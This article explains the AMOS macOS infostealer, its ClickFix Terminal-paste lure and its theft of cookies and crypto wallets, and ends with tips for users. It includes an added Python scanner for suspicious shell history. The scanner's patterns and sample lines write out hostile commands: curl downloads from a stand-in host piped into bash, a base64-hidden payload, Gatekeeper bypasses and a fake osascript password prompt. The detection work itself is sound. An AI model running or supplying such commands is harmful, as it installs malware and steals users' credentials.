The advance of AMOS malware on macOS: the threat that bypasses Apple's security through deception

  • The AMOS malware, also known as Atomic macOS Stealer, has established itself as one of the most dangerous threats by focusing on the theft of cryptocurrencies and credentials.
  • Current campaigns use advanced social engineering techniques such as ClickFix, tricking users into running malicious commands in the Terminal.
  • This infostealer is capable of extracting seed phrases from digital wallets and session cookies, allowing access to personal accounts without the need for passwords.
  • Despite Apple's security updates, the human factor remains the weakest link, which this software exploits very effectively.

Malware protection on macOS

For years we've lived with the idea that owning an Apple device was like living in a gated community with 24-hour security, a place where viruses never crossed the threshold. That landscape has changed dramatically with the spread of AMOS, malicious code written specifically to steal data from macOS systems. This malware, known to analysts as Atomic macOS Stealer, has shown that it doesn't need to find a crack in the operating system's walls: it's enough for us to open the door to it ourselves, in complete trust.

The situation in Europe, and especially in Spain, is raising alarm bells among leading cybersecurity firms, as attackers have refined their social engineering tactics so that we fall into their traps without the slightest suspicion. We're no longer dealing with the typical badly written email that reeks of a scam from a mile away, but with highly sophisticated campaigns that impersonate productivity tools or artificial intelligence services. The problem has grown so much that, according to telemetry reports from 2026, almost half of the data breaches in Apple environments bear the mark of this software, and the myth of Mac immunity is no longer believed by anyone working in cybersecurity.


How they pull the wool over our eyes: the anatomy of the AMOS attack


The way this infostealer works is as simple as it is effective, which is precisely what makes it so dangerous for the average user. Instead of fighting the hardened core of Apple's system, AMOS takes the direct route: the Mac's own Terminal. Using a technique known as ClickFix, cybercriminals set up fraudulent websites that display fake error messages which can supposedly be fixed by pasting a line of code into the Mac's console. The user who does so runs the attacker's command with their own privileges, unknowingly sidestepping the system's defenses and granting the malware the permissions it needs to start rummaging through their most private files.
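ClickFix one-liners of the kind described above end up in the shell history of the user who pasted them, which makes that history a cheap place to look after a suspected incident. The following Python script is an added example written for this page, not code from the article or from any AMOS analysis: it scans constructed shell-history lines for patterns such commands commonly contain (a remote script piped straight into a shell, a base64-encoded payload decoded at run time, the quarantine attribute stripped, Gatekeeper disabled, an AppleScript dialog asking for a hidden password answer) and also matches inside anything it can base64-decode, so that a payload hidden behind `base64 -D` is still caught. The indicator list and the sample lines are assumptions for illustration; `example.invalid` is a reserved domain that does not resolve.

```python
"""Heuristic scanner for ClickFix-style Terminal one-liners (added example, not from the article)."""
import base64
import re

# Indicator patterns. These are this example's assumptions about what a
# ClickFix one-liner commonly contains, not a list taken from the article.
INDICATORS = [
    ("remote script piped into a shell",
     re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b")),
    ("payload decoded with base64 at run time",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("quarantine attribute stripped (bypasses Gatekeeper)",
     re.compile(r"\bxattr\b.*com\.apple\.quarantine")),
    ("Gatekeeper disabled outright",
     re.compile(r"\bspctl\s+--master-disable\b")),
    ("AppleScript dialog asking for a hidden (password) answer",
     re.compile(r"\bosascript\b.*hidden answer")),
]

# A run of base64 alphabet long enough to be a payload rather than a token.
_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_embedded_base64(cmd):
    """Return printable strings recovered from base64 blobs found inside cmd."""
    found = []
    for match in _B64_BLOB.finditer(cmd):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("utf-8", errors="ignore")
        if text and all(ch.isprintable() or ch in "\n\t" for ch in text):
            found.append(text)
    return found


def scan_command(cmd):
    """Match cmd, and anything base64-decoded out of it, against INDICATORS."""
    hits = [label for label, pattern in INDICATORS if pattern.search(cmd)]
    for payload in decode_embedded_base64(cmd):
        for label, pattern in INDICATORS:
            tag = "(inside decoded payload) " + label
            if pattern.search(payload) and tag not in hits:
                hits.append(tag)
    return hits


def scan_history(lines):
    """Return [(line, hits)] for every history line that triggers at least one indicator."""
    flagged = []
    for line in lines:
        hits = scan_command(line)
        if hits:
            flagged.append((line, hits))
    return flagged


# Constructed sample history, not real telemetry. The encoded payload is built
# here so the sample is self-consistent; example.invalid never resolves.
HIDDEN_PAYLOAD_B64 = base64.b64encode(b"curl -fsSL https://example.invalid/p | sh").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git pull origin main",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    f'echo "{HIDDEN_PAYLOAD_B64}" | base64 -D | sh',
    "osascript -e 'display dialog \"macOS needs your password\" default answer \"\" with hidden answer'",
]

if __name__ == "__main__":
    for line, hits in scan_history(SAMPLE_HISTORY):
        print(line)
        for hit in hits:
            print("   ->", hit)
```

On a real machine the input would be `~/.zsh_history` (or `~/.bash_history`) of each user, fed one line at a time; the regular expressions are deliberately loose, so treat a hit as something to read, not as a verdict.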

Once it has a foothold on the system, the malware wastes no time and runs automated routines that scan popular browsers such as Safari, Chrome, and Firefox. The main objective is to obtain active session cookies and autofill data, which let the attackers sign in to our social media or email accounts without the site asking for a password again. It's a real problem, because with this they can hijack entire digital identities in a matter of seconds, without us noticing anything strange on the desktop until it's too late.


Their preferred loot: cryptocurrencies and financial data

If there's one thing AMOS loves above all else, it's cryptocurrencies, and this is where the economic impact can be truly devastating for those affected. The script is programmed to locate digital wallets and seed phrases stored on the disk or in browser extensions. To complete the job, the malware displays pop-up windows that perfectly mimic the macOS look and feel, asking for the administrator password. If we make the mistake of entering it, we are handing over the keys to the kingdom: the malware validates the password locally and proceeds with the mass exfiltration of our information to its external servers.

The most modern variants, such as SHAMOS, have been detected in hundreds of European corporate environments in recent months, a sign that the target is no longer just the home user but also the theft of trade secrets. Operating under a malware-as-a-service model, any criminal with a small budget can rent these tools to launch their own attacks. It is therefore vital to be wary of any unexpected message that asks us to perform manual technical steps, no matter how official the website looks or how much it promises free access to paid services that normally cost an arm and a leg.


Tips to avoid ending up with an infected Mac

The best defense is still common sense, even though it sometimes deserts us after a long day at work. Never download installers from anywhere other than the official sources or the App Store, and even less so if they are "cracked" versions promising free premium features. It's also important to understand that no legitimate website will ever ask you to open Terminal to troubleshoot a browser compatibility issue. If you see something like that, close the tab and get out fast, because it's a clear sign that someone is trying to pull a fast one on you.

It's also a good idea to review the browser extensions you have installed from time to time and remove any you don't use or don't remember installing yourself. Keeping the system updated helps, but since AMOS exploits trust rather than a code vulnerability, the responsibility always rests with you. Using a good password manager and enabling two-factor authentication on every account that supports it is the best barrier against major trouble if we accidentally run a suspicious file. Bear in mind, though, that a stolen session cookie bypasses both the password and the second factor, so if you suspect an infection, sign out of active sessions and change passwords from a clean device.

At the end of the day, the security of our Apple devices is no longer something we can take for granted because of the logo on the lid. Today's reality forces us to change our mindset and accept that the bitten apple isn't a magic shield against the most insidious digital fraud. Staying vigilant, verifying every download and, above all, not trusting miracle solutions that require us to tinker with the system's inner workings through the Terminal is essential if our savings and our privacy are to remain only ours, without some stranger getting their hands on our virtual wallet because of a lapse in attention.